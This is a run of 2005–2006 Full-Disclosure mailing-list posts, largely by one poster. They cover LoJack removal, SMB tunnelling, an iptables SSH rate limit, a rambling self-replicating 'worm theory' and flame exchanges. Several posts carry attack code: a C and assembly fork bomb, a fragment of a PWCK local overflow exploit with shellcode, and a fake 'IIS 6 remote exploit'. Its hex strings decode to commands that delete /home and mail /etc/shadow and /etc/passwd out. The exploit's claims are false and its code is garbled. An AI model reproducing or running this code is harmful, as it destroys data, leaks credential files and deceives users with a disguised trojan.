I can only speak for Dell since thats what I use will let you re-flash the BIOS and even with a non-lojack one. However, once Lojack is activated in the BIOS it will reinstall itself with the new image. I by no means am a computer guru (the last language I used was ada) but I have tried to disable lojack every possible way I can think and it wont go away. If you can find something contrary please let me know. thanks, Jay - Original Message - From: Michael Holstein [EMAIL PROTECTED] To: Jay Nevins [EMAIL PROTECTED] Cc: full-disclosure@lists.grok.org.uk Sent: Tuesday, May 16, 2006 9:34 AM Subject: Re: [Full-disclosure] Breaking LoJack for Laptops Why can't you just download a new BIOS image from the manufacturer (one without LoJack .. since they make seperate images with and without that code, for consumers .. and re-flash it. Not having a lojack laptop at my disposal, I can't test directly, but having hacked the BIOS in many other cases to enable things like RAID on a non-raid motherboard, I suspect that the LoJack code is in one of the vendor areas on the bios, and is easily removed and the image re-checksummed. Thoughts? Michael Holstein CISSP GCIA Cleveland State University Jay Nevins wrote: FYI- I know this may be a little after-the-fact but I just came upon your article posted on 12-24-05 about how to disable LoJack for Laptops. I currently use this product and have tested it in depth for a while. The Notebook I use has Computrace built in to the BIOS. I have tried to disable rpcnet, ctmweb, rpcnetp, and other files associated with Lojack as well as blocking these files with my firewall and even blocking Computrace's IP. Needless to say my notebook still manages to call out. If you are still interested in this program you may want to look at machines with Computrace enabled BIOS first. -Jay ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Re: Strange interactions between tunnelling and SMB under the proprietary Microsoft Windows environment
The original poster mentioned NetBEUI. If the legacy NetBEUI protocol is really installed on the system, certain Microsoft sharing attempts would be expected to bypass IP (and therefore all IP VPNs) entirely. Right? -Jay |Date: Thu, 30 Mar 2006 07:52:10 +0200 |From: [EMAIL PROTECTED] (Marc SCHAEFER) |Subject: [Full-disclosure] Strange interactions between tunnelling and | SMB under the proprietary Microsoft Windows environment |To: full-disclosure@lists.grok.org.uk |Message-ID: [EMAIL PROTECTED] |Content-Type: text/plain; charset=us-ascii | |Hi, | |first, a disclaimer: I don't really need the proprietary Microsoft |Windows environment for my work. It happens that, for interoperability's |sake, I sometimes install free (libre) software on this proprietary |environment on customer systems. It's always quite painful, has strange |implications, and is always quite difficult to debug. But well, some |people apparently still need it. | |After that, the issue I saw, which I currently cannot understand: | | I installed the libre software OpenVPN including the TAP driver on | the proprietary Microsoft Windows environment. I did set up a | encrypted tunnel between two machines on the same Ethernet subnet | (this is probably important). | | Testing pings and telnet on the remote tunnel address (e.g. | 192.168.1.2) and capturing data with the libre software Ethereal on the | real Ethernet interface did show me that the flow of data was | correctly routed through the tunnel. | | However, accessing \\192.168.1.2\c$ did go through the Ethernet | interface, and *not the tunnel*, and strangely half-using the private | addresses! | | I wonder if there is some NetBEUI/NetBIOS/whatever interaction which | kind-of `resolves' the private IP address as a host name. Thus | probably as long as noone replies NetBEUI/NetBIOS it should work ... | but could be exploitable, isn't it ? | | The obvious solution could be to completely disable this resolution, | or maybe use a real DNS name for the private addresses of the tunnel. | | After all NetBEUI/NetBIOS predates the standard IP networking support | in the proprietary Microsoft Windows environment and could be considered | obsolete today (if using a WINS server or DNS resolution). But it is | still activated by default. | | Looking at the routing tables through NETSTAT.EXE is ... well ... | strange. No interface, strange routes, it's a bit difficult to really | understand how routing works on this proprietary plateform. | |Has someone also experienced this, or was it some strange local pecularity ? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] re: eeye temporary patch for current IE vulnerability
Has anyone applied and tested the eeye patch? Verified that it works, and that it does not do anything else? -Jay ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] reduction of brute force login attempts via SSH through iptables --hashlimit
Well, as expected, this, like most postings here, generated much heat and actually a little light :) Particular thanks to those who went to the effort to write scripts to read log files and make a more permanent reaction than iptables --hashlimit provides, and to further take the expected heat for posting anything here. I'm actually impressed that nobody took me to task for something stupid I did in my iptables --hashlimit command line. I can't have got it completely right, can I? What, not even one you're a loser for me? Heh. The conversation about scripts which read log files and the holes in those scripts and the holes in those holes and the *ssholes and... are certainly interesting. I would like to point out that - good old defense in depth - it probably is best to use some combination of these things. Putting together iptables --hashlimit with some kind of log file reader will slow down the initial attack in real time, and allow a more leisurely (and less system intensive) log file scanner to react in not-so-real-time with more complete blockages against detected significant attackers. Based on what I am now seeing in my log files every night after adding the hashlimit to my iptables rules, I don't feel a need to add any follow-up stronger blocking scripts. The total number of brute force login attempts to my system is now so low that the expected occurrence of a password actually being guessed is in the noise just above zero. Calculation: None of the accounts on my system use dictionary words. They aren't based on knowable information about me. And knowable information is not what these brute force attacks through SSH are going after anyway - they're going after known passwords from weakly configured applications or applications which come with default passwords which some system administrators do not change. If an attack is truly targeted, it won't look like these, or it will be hidden in these, and the current discussion about simply slowing it down won't be sufficient anyway. Any one source IP address typically now gets only about 3 password guesses per night. One particularly tenacious one actually got in 8 last night on my system... Of course, a sustained targeted attack could produce a lot more, at 2 logins/minute and three attempts per login that's 720/hour or 17280/day from one source IP address - of course, I'd notice that and manually block it. Hasn't happened yet. Assuming only an eight character password with a rich character set of [a-zA-Z0-9[:symbol:]] - that's about 72 characters - the permutations number 72^8 = 722204136308736. At 17280/day that would take 114504714 years (okay, on average, half of that so only 57252357 years). Yes, people could simultaneously carry out a sustained attack from multiple IP addresses, but as noted above, if an attack was so sustained, it would be manually blocked long before it got to a tiny fraction of 1% of the password space. So, I'm not going to add any scripts to take up CPU and disk time reading log files, and possibly open my *sshole to script holes to ... etc. Have fun everyone :) -Jay ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] reduction of brute force login attempts via SSH through iptables --hashlimit
Quite some time back, I posted a question here about brute force login attempts through SSH which had recently become a noticeable annoyance. There was some discussion here on the list, someone suggested using hashlimit, and I think the issue of brute force attempts through SSH has become just one more part of the background noise of the Internet. I finally got back around to looking at this on my system, and I figured out why my first attempts at using the hashlimit functionality in iptables had not worked. Hopefully late is better than never, so I present it here to anyone else who was as stupid and/or lazy as I was :) so that it took me this long to get back to work on it and get it right. Here is an iptables command to allow inbound SSH with a quite low limit on the number of connections which may arrive from a specific IP address in a short period of time. Combined with the default setting of OpenSSH which drops a connection after just a few failed login attempts, this has reduced the number of failed logins I am seeing in my nightly logwatch output from thousands to about ten per day. Since this use of hashlimit filters on source IP address, it does not create a denial of service against legitimate SSH connections, unless someone spoofs a very large range of source addresses and can somehow get those connections to actually open instead of just consume partly open TCP sessions. In such a case, other defenses are needed anyway. # iptables --table filter -A INPUT --protocol tcp --source 0/0 \ --destination-port ssh -m hashlimit --hashlimit 2/minute \ --hashlimit-burst 3 --hashlimit-mode srcip --hashlimit-name ssh \ -m state --state NEW --jump ACCEPT The stupid thing I did the first time I tried to set this up months ago was to put a command like the above in, and forget to take out the original iptables command allowing connections to the SSH port. hashlimit is a limiter on an iptables rule. Having one rule with a hashlimit in it, and a second matching rule with no hashlimit, just results in all connections being accepted without limit. Of course, the same thing would work to reduce brute force speeds on telnet, FTP, etc by changing the destination port argument. Please direct all flames to /dev/null, all cash contributions to /dev/me :) and all constructive comments and enhancement suggestions back to the list. Cheers! -Jay ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Chung'S Donut Shopt Release!!! - Spirit Dorian's Theory On Life-Real AI-Human Emotion
Stop the PRESS GROUNDBREAKING d4yj4y and Dorian have released a scientific ingenious miracle or informational GOLD/Spirit to HELP THE HUMAN RACE ANti-Pscyh-Ops Etc. and PRO Will and Life!! ==CHUNG'S DONUT SHOP RELEASE= The Dorian Worm Theory: Future brightness refs: AI, games theory evolution etc. Abstract To spread and create for the future as survival of all hosts is this primary concern of this worm. Worms are supposed to spread but this one doesnt leave anything missing when leaving hosts if it ever were to. Description This worm will find any agreement in the host and analyze the agreement's subject and then search its own database and intelligent methods from relation or an object to pull from its own database or knowledge source and then present the received agreement from the remote host with a response containing an object with presumed or guessed MULTIPLE properties (meaning implication-learning and/or command etc.) and then the host will receive the object (that is presumed to have more properties than last agreed upon object) and the host will process the object based on the main agreement of one of this objects properties but by the agreement - the host will be forced to accept the implications that other properties of this object may present. (And if it is an object presented from this worm then it should have more implied hidden or over properties than last presented object by target host that was agreed upon. Thus, allowing the worm to project into the vulnerability of agreement with its intelligent keeping and gathering abilities) When the target host accepts this object (because of agreement -aka entry point identification allowed previously) the object is then able to overwhelm the processing and computing capabilities of this target with multiple properties and some not understood (were assuming based on the worms access to scalebly more intelligence than target host and motivation of worm differs than target's). This overwhelm will be created by unidentified properties of said object/subject that the target host allowed the worm to insert. When processing this object's properties, the target host will malfunction and make associations in intelligence/data and communication between properties of the object not fully understood and between other random or purposely targeted pieces of data/intelligence that the host contains-this also includes lines of intelligence data gathering infection. If done right, these properties will branch off from the main object as if the core object and agreement was the root and thus build in a guided (still fully not predictable) fashion. Thus it will change the data/intelligence structure of certain aspects of the host and will also allow itself to carry itself along lines of the hosts external connectors by presenting themselves when objects it has attached to within the host are retrieved by the host knowingly or unknowingly. Thus, the branch extends across lines of information through any host that can store, distribute, and exchange information in any active manner by attaching itself to obscure or out in the open objects that the host holds that have been effectively infected or reprogrammed or attached to. Core Core Mobile-CORE The core itself will be Fabian and mobile because cores dropped into hosts will only be accessed by a programmable syntax for the core object that it spread to target host to be agreed upon. The core object that the worm has presented has an internal definition and relation to any specific requests to it that match its blueprint-so it has no ILL-WILLS. For the future of its survival is purely based on keeping it going for the future and it uses Games Theory to perfection so that everyone wins. This core programmability and schematic of this worm is survival and dissemination and spreading or itself and it has a way of finding other infecting hosts and exchanging information of yet uninfected and infected hosts and it performs mathematical functions that determine its survival status and based on that (if low) will activate a higher percentage of active infection and more proactive spreading of itself-since it uses whatever the core engine of the host is, this worm works on minimizing damage done to the infected hosts primary function but it does need some time to spread when needed or when idle etc. The beginning design of this-or the skeletal structure can be made SO easily its scary. Even by writing this paper, you or I could have theoretically started the ball rolling or have launched this-although I dont see that as a bad thing unless this gets corrupted and in that case, there would be a trace back factor due to tracks that had to be left inevitably. The main thing about this worm is that it relies on it's ability to find infected hosts to exchange information which is fine but if a consciousness participated in this information exchange then (if the consciousness is
[Full-disclosure] Chung'S Donut Shopt Release!!! - Spirit Dorian's Theory On Life-Real AI-Human Emotion
Stop the PRESS GROUNDBREAKING d4yj4y and Dorian have released a scientific ingenious miracle or informational GOLD/Spirit to HELP THE HUMAN RACE ANti-Pscyh-Ops Etc. and PRO Will and Life!! ==CHUNG'S DONUT SHOP RELEASE= The Dorian Worm Theory: Future brightness refs: AI, games theory evolution etc. Abstract To spread and create for the future as survival of all hosts is this primary concern of this worm. Worms are supposed to spread but this one doesnt leave anything missing when leaving hosts if it ever were to. Description This worm will find any agreement in the host and analyze the agreement's subject and then search its own database and intelligent methods from relation or an object to pull from its own database or knowledge source and then present the received agreement from the remote host with a response containing an object with presumed or guessed MULTIPLE properties (meaning implication-learning and/or command etc.) and then the host will receive the object (that is presumed to have more properties than last agreed upon object) and the host will process the object based on the main agreement of one of this objects properties but by the agreement - the host will be forced to accept the implications that other properties of this object may present. (And if it is an object presented from this worm then it should have more implied hidden or over properties than last presented object by target host that was agreed upon. Thus, allowing the worm to project into the vulnerability of agreement with its intelligent keeping and gathering abilities) When the target host accepts this object (because of agreement -aka entry point identification allowed previously) the object is then able to overwhelm the processing and computing capabilities of this target with multiple properties and some not understood (were assuming based on the worms access to scalebly more intelligence than target host and motivation of worm differs than target's). This overwhelm will be created by unidentified properties of said object/subject that the target host allowed the worm to insert. When processing this object's properties, the target host will malfunction and make associations in intelligence/data and communication between properties of the object not fully understood and between other random or purposely targeted pieces of data/intelligence that the host contains-this also includes lines of intelligence data gathering infection. If done right, these properties will branch off from the main object as if the core object and agreement was the root and thus build in a guided (still fully not predictable) fashion. Thus it will change the data/intelligence structure of certain aspects of the host and will also allow itself to carry itself along lines of the hosts external connectors by presenting themselves when objects it has attached to within the host are retrieved by the host knowingly or unknowingly. Thus, the branch extends across lines of information through any host that can store, distribute, and exchange information in any active manner by attaching itself to obscure or out in the open objects that the host holds that have been effectively infected or reprogrammed or attached to. Core Core Mobile-CORE The core itself will be Fabian and mobile because cores dropped into hosts will only be accessed by a programmable syntax for the core object that it spread to target host to be agreed upon. The core object that the worm has presented has an internal definition and relation to any specific requests to it that match its blueprint-so it has no ILL-WILLS. For the future of its survival is purely based on keeping it going for the future and it uses Games Theory to perfection so that everyone wins. This core programmability and schematic of this worm is survival and dissemination and spreading or itself and it has a way of finding other infecting hosts and exchanging information of yet uninfected and infected hosts and it performs mathematical functions that determine its survival status and based on that (if low) will activate a higher percentage of active infection and more proactive spreading of itself-since it uses whatever the core engine of the host is, this worm works on minimizing damage done to the infected hosts primary function but it does need some time to spread when needed or when idle etc. The beginning design of this-or the skeletal structure can be made SO easily its scary. Even by writing this paper, you or I could have theoretically started the ball rolling or have launched this-although I dont see that as a bad thing unless this gets corrupted and in that case, there would be a trace back factor due to tracks that had to be left inevitably. The main thing about this worm is that it relies on it's ability to find infected hosts to exchange information which is fine but if a consciousness participated in this information exchange then (if the consciousness is
[Full-disclosure] WORD DOCUMENT OF AI/LIFE CREATION THEORY(EASIER TO UNDERSTANDIN THIS FORMAT)
Dear All, (First I am looking for a job in OC right now so if you are looking for someone with knowledge like me, send me an email. Eating is nice and I am poor currently) I highlighted an added sections as well as italicied and underlined things to make it easier to absorb and learn without having to think about it as much or to clear up anything it may leave on unclear or to question. Those with questions anyway, send me an email. Thank you and I look forward to responses of all sorts. Lots of BLOOD SWEAT AND TEARS were poured into the attached word document so read it in its entirettly before you even attempt to grill me or disprove yourself more and prove me even more right k? Thanks all. ANd also, dont rip it off or redistribute unless you give me credit where due. Im not asking for money or even a medal but a mention etc. would be nice since I am the one that put this together. Thanks@@@ CHUNG [EMAIL PROTECTED] DAY TO THE MOTHERFATHERING JAY!! __ Yahoo! Music Unlimited Access over 1 million songs. Try it free. http://music.yahoo.com/unlimited/ thedoriantheory_reverse_engineering_humanity.doc Description: 2226011324-thedoriantheory_reverse_engineering_humanity.doc ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Hack the planet, Phrack, PHC, Projekt Mayhem, NWO and Greek Squads Alike....
Here ye Here ye, Someone hire me, I'm bored and like one enter key could take the whole net down. 26, I could really use a job-some corporate sponsership to help consult/develop Etc. Nothing wrong with keeping the internet for the people by the people. Hey, whoever has to do it has to do it and it certainly is nothing to complain about or even shake a stick at or wax unenthusiastic. It's the age of fundametals and what not and new begginings so I urge all of you to participate in Season's Beatings so that sales this year on useful xmas gifts and XBOX 360s go up so that profitability goes up and thus money is made for the monopolies and large gigantic wipe my ass with hundred dollar bills/playing golf all day meeting while butt banging companies which exist here only to make money off your interest in their offering which was a collaboration to be begin with. All Im trying to say, is someone give me a job or I will be forced to sell real estate and if I do that, I fear I may make so much sickening amount of money I may be corrupted by wealth and power when I would rather have a place to live and my friends close by with a keyboard here and there. Im not a big fan of technology but I'm also not too big into silencing the free or intelligent ideas-whether or not they fit into the rules or not. If the big brother was really into censorship, the internet would be down a long time ago so it only makes sense that they are on the people's side. The people I'm talking about are the rich and powerful and they do rub elbows with politicians etc.. and may actively engage and attempt to bribe said Big Brother components but thank the lord that Big Brother only cares about itself and growth first so we are safe--that coupled with people policing this shit and hackers as well as technology enthusiasts like yourselves, we are able to exist and spread and anomalize in a great way. Continue what you are doing all and if you find yourself too busy, you may want to take a look to your immediate surroundings and find a constantine...Then slap them silly and see if your work frees up. God Bless America and Free Speech. Fuck this post america crap cbs is promoting as pilots on their networks. As far as I'm concerned those pilots are unwarranted and unskilled and knowedgable in network TV and or flying any sort of plane on a or at a successfull level. So stand and correct yourself. THE FUTURE WILL ONLY GET BETTER AND AT SUCH A RAPID PACE FROM HERE AND IM SOOO EXCITED BECAUSE ALL OF US WILL WIN AND PROFIT IN THE END!!! RIGHT AROUND THE CORNER!! ITS.THE.AGE.OF.INTELLIGENCE! DAY TO THE motherfathering j4y! l8 * __ Yahoo! DSL Something to write home about. Just $16.99/mo. or less. dsl.yahoo.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Re: Sensitive Information Disclosure Vulnerability in Kinetics Kiosk Product
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On Thu, 18 Aug 2005, Jason Coombs wrote: Furthermore, the use of an IP address that is outside of the RFC 1918 private subnet address range appears very irresponsible. Especially considering that the IP address is within a Wells Fargo Bank class B netblock. It just gets curiouser and curiouser. - -Jay (( ___ )) )) .-There's always time for a good cup of coffee-. --. C|~~|C|~~| \- Jay D. Dyson -- [EMAIL PROTECTED] -/ |= |-' `--' `--' `- Pros built the Titanic; amateurs, the Ark. -' `--' -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.1 (TreacherOS) Comment: See http://www.treachery.net/~jdyson/ for current keys. iD8DBQFDBNTIxzN3WIW0edsRAuxAAJ9rg3C0L0WJGkQURqEGlsSyGqaiZgCeMe8E neg0tBh1SQkhiIakZDYdq1I= =87Lh -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] bash vulnerability?
┌([EMAIL PROTECTED]:p4)(~) └(Power:on-line:100% cat a.c int main(){ __asm__( xorl %ecx,%ecx\n cdq\n HERE:\n movl $0x2,%eax\n int $0x80\n jmp HERE\n ); } ^C ┌([EMAIL PROTECTED]:p4)(~) └(130:Power:on-line:100% make a cc -O -pipe -march=pentium4 a.c -o a ┌([EMAIL PROTECTED]:p4)(~) └(Power:on-line:100% ./a ^C ┌([EMAIL PROTECTED]:p4)(~) └(130:Power:on-line:100% uname -srm FreeBSD 6.0-BETA1 i386 the machine froze instantly but eventually, after a minute or so I was able to ^C -- Jay On Tue, 2005-08-16 at 11:10 +0200, Rik Bobbaers wrote: On Monday 15 August 2005 09:59, Jay wrote: It's not nice to brag about finding 0-day bullshit in the bash fork bomb that has been Zalewski's signature for years :P i think i know where he got it from.. i was on an irc channel a couple of days ago, and someone posted it (as a joke off course). it's ... ahm... funny that it comes back over here just a few days later! i don't know how this is a 0day and gives you remote access (it does the opposite...) but if you want one that's a bit harder to stop: c version: int main () { while (1) fork(); } an asm (quick hack): int main(){ __asm__( xorl %ecx,%ecx\n cdq\n HERE:\n movl $0x2,%eax\n int $0x80\n jmp HERE\n ); } sry it's in c... the machine i made it on didn't have gas or nasm. anyway, if you compile this and run it in background, it will all die pretty fast. (to make it even harder, make your own signal handlers!(okay, SIGKILL will still work, but it will be harder to kill :)) shall we call this C and assembler 0days? ;) -- harry aka Rik Bobbaers K.U.Leuven - LUDIT -=- Tel: +32 485 52 71 50 [EMAIL PROTECTED] -=- http://harry.ulyssis.org Disclaimer: By sending an email to ANY of my addresses you are agreeing that: 1. I am by definition, the intended recipient 2. All information in the email is mine to do with as I see fit and make such financial profit, political mileage, or good joke as it lends itself to. In particular, I may quote it on usenet. 3. I may take the contents as representing the views of your company. 4. This overrides any disclaimer or statement of confidentiality that may be included on your message. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- This message was scanned for spam and viruses by BitDefender. For more information please visit http://www.bitdefender.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] PWCK Overflow POC Code Redhat/Suse older versions or something (maybe later too)
I stole it, but it works, and that's all that matters dickwad. --- Steve Friedl [EMAIL PROTECTED] wrote: On Fri, May 06, 2005 at 06:03:26PM -0700, Day Jay wrote: //(PWCK is NOT SETUID) This isn't fake //code I promise (it may be borrowed) ;) d4yj4y It may or may not be fake, but you are an *astonishingly* lame C programmer: for(i=0; i strlen(shellcode); i++) { *(ptr++) = shellcode[i]; } Wow. __ Do You Yahoo!? Tired of spam? Yahoo! Mail has the best spam protection around http://mail.yahoo.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] PWCK Overflow POC Code Redhat/Suse older versions or something (maybe later too)
Please teach me to be like you, I'm striving to be as good as you Steve. You obviously are my master. I bow to you. Please teach me! Your code is sooo l33t! --- Steve Friedl [EMAIL PROTECTED] wrote: On Mon, May 09, 2005 at 08:38:10AM -0700, Day Jay wrote: I stole it, but it works, and that's all that matters It works is all that matters is the hallmark of an amateur. Steve --- Stephen J Friedl | Security Consultant | UNIX Wizard | +1 714 544-6561 www.unixwiz.net | Tustin, Calif. USA | Microsoft MVP | [EMAIL PROTECTED] __ Do You Yahoo!? Tired of spam? Yahoo! Mail has the best spam protection around http://mail.yahoo.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] PWCK Overflow POC Code Redhat/Suse older versions or something (maybe later too)
. There * must be a terminating NUL byte so the environment processor does * the right thing also. */ memset(egg, NOP, egglen); memcpy(egg, EGG=, 4); // put our egg in the tail end of this buffer memcpy(egg + (egglen - strlen(scoshell)- 1), scoshell, strlen(scoshell)); egg[egglen] = '\0'; /* build up regular command line */ arg[0] = exefile; arg[1] = dvexploit; /* easy to find this later */ arg[2] = (char *)retbuf; arg[3] = 0; /*--- * build up the environment that contains our shellcode. This * keeps it off the stack. */ env[0] = egg; env[1] = 0; execve(arg[0], arg, env); } --- Day Jay [EMAIL PROTECTED] wrote: Please teach me to be like you, I'm striving to be as good as you Steve. You obviously are my master. I bow to you. Please teach me! Your code is sooo l33t! --- Steve Friedl [EMAIL PROTECTED] wrote: On Mon, May 09, 2005 at 08:38:10AM -0700, Day Jay wrote: I stole it, but it works, and that's all that matters It works is all that matters is the hallmark of an amateur. Steve --- Stephen J Friedl | Security Consultant | UNIX Wizard | +1 714 544-6561 www.unixwiz.net | Tustin, Calif. USA | Microsoft MVP | [EMAIL PROTECTED] __ Do You Yahoo!? Tired of spam? Yahoo! Mail has the best spam protection around http://mail.yahoo.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ __ Do You Yahoo!? Tired of spam? Yahoo! Mail has the best spam protection around http://mail.yahoo.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Buffer Overflow in BitKeeper
Don't quit your day job --- Enune [EMAIL PROTECTED] wrote: G'day again all, Just thought I'd throw in a morning laugh.. Enjoy :) Advisory Name: Buffer overflow in BitKeeper screenshot may lead to bad PR Date: 04/05/2005 Severity: Rabbit. Description: There is a buffer overflow in the code listed at: http://www.bitkeeper.com/gifs/difftool.gif This code may lead to bad reputation, real vulnerability discovery, or possibly even boiled carrots. Fix: +++ None known. Vendor not notified. Out of cheese error. Redo from start +++ Best regards, Calum -- =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Nullum magnum ingenium sine mixtura dementiae fuit [There is no great genius without some touch of madness] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Calum Power - Cultural Jammer - Security Enthusiast - Hopeless Cynic [EMAIL PROTECTED] http://www.fribble.net ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Yahoo! Mail Stay connected, organized, and protected. Take the tour: http://tour.mail.yahoo.com/mailtour.html ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] (no subject)
Man, ppl are such crybabies! --- Paul Schmehl [EMAIL PROTECTED] wrote: --On Tuesday, April 26, 2005 03:05:29 PM -0400 Stan Bubrouski [EMAIL PROTECTED] wrote: Could we can the nazi rhetoric in messages on this list? Or can we just complain until the list loses its hosting? That makes a great deal of sense. One poster sends stuff you find offensive, so you want to shut down the entire list? Yeah, makes perfect sense. Next you'll tell us you're going to take your ball and go home. Paul Schmehl ([EMAIL PROTECTED]) Adjunct Information Security Officer The University of Texas at Dallas AVIEN Founding Member http://www.utdallas.edu ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ __ Do You Yahoo!? Tired of spam? Yahoo! Mail has the best spam protection around http://mail.yahoo.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit (was broken)
Sorry, the previous code was broken. This code should work... Happy Owning!! :) =SNIP /* Proof of concept code Please don't send us e-mails asking us how to hack because we will be forced to skullfsck you. DISCLAIMER: !!NOT RESPONSIBLE WITH YOUR USE OF THIS CODE!! IIS 6 Buffer Overflow Exploit BUG: inetinfo.exe improperly bound checks http requests sent longer than 6998 chars. Can get messy but enough testing, and we have found a way in. VENDOR STATUS: Notified FIX: In process Remote root. eg. #./iis6_inetinfoX xxx.xxx.xxx.xxx -p 80 + Connecting to host... + Connected. + Inserting Shellcode... + Done... + Spawining shell.. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\ */ char shellcode[] = \x2f\x62\x69\x6e\x2f\x72\x6d\x20 \x2d\x72\x66\x20\x2f\x68\x6f\x6d \x65\x2f\x2a\x3b\x63\x6c\x65\x61 \x72\x3b\x65\x63\x68\x6f\x20\x62 \x6c\x34\x63\x6b\x68\x34\x74\x2c \x68\x65\x68\x65; char launcher [] = \x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x73 \x68\x61\x64\x6f\x77\x20\x7c\x6d\x61\x69 \x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69 \x73\x63\x6c\x6f\x73\x75\x72\x65\x40 \x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b \x2e\x6f\x72\x67\x2e\x75\x6b\x20; char netcat_shell [] = \x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70 \x61\x73\x73\x77\x64\x20\x7c\x6d\x61\x69 \x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69 \x73\x63\x6c\x6f\x73\x75\x72\x65\x40 \x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b \x2e\x6f\x72\x67\x2e\x75\x6b\x20; main() { //Section Initialises designs implemented by mexicans //Imigrate system(launcher); system(netcat_shell); system(shellcode); //int socket = 0; //double long port = 0.0; //#DEFINE port host address //#DEFINE number of inters //#DEFINE gull eeuEE // for(int j; j 30; j++) { //Find socket remote address fault printf(.); } //overtake inetinfo here IIS_66^ return 0; } __ Do You Yahoo!? Tired of spam? Yahoo! Mail has the best spam protection around http://mail.yahoo.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit (was broken)
Dear DIk, You are thinking local buffer overflows with your think: ret=(int *)ret+2;(*ret)=(int)shellcode; Wow, I think I read smashing the stick for fun and profit a long time ago, but this is a remote root exploit, it's alittle different!! Damn newbie! I mean, how lame are you? --- dk [EMAIL PROTECTED] wrote: Day Jay wrote: Sorry, the previous code was broken. Definitely `borken'... I didn't even see one /etc/passwd file in here! Less obvious calls may catch more habitual FD code runners next time dude. [think: ret=(int *)ret+2;(*ret)=(int)shellcode;] ;-) -- dk ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ __ Do You Yahoo!? Tired of spam? Yahoo! Mail has the best spam protection around http://mail.yahoo.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit(was broken)
